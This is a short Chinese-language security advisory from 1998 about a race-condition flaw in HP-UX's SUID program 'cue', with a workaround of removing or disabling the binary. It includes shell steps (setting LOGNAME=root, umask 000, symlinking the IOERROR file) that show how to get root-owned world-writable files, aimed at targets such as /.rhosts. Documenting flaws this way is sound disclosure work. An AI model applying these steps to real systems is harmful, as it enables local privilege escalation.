HP-UX的cue存在安全漏洞发布时间:1998-01-23 更新时间:1998-01-23 严重程度:高 威胁程度:本地管理员权限 错误类型:竞争条件 利用方式:服务器模式 受影响系统 HP-UX详细描述 cue是Hewlett Packard Character-base User Environment,是一个SUID程序,但它有个特殊的功能,看看下面: $ export LOGNAME=root $ cue Welcome root 当然你在得到SHELL时候cue程序废弃了其自身的SUID权限,但有一个的问题存在,如果你使用ls -la,你会看到: -rw------- root mygroup 0 IOERROR.mytty 此程序也能收umask作用: $ umask 000 $ cue -rw-rw-rw- root mygroup 0 IOERROR.mytty 现在测试是否可以做符号连接,下面是对 /lost+found/test进行了符号连接的内容: $ cue $ ls -la /lost+found -rw-rw-rw- root mygroup 0 test 说明它是可以用来进行符号连接的,所以也存在连接/.rhosts等敏感文件。 测试代码 见描述 解决方案 由于HP-UX在11.0以后不使用cue了,所以没有推出补丁,可以使用下面的方法来解决: chmod 000 /usr/bin/cue 或者 rm /usr/bin/cue 相关信息 |
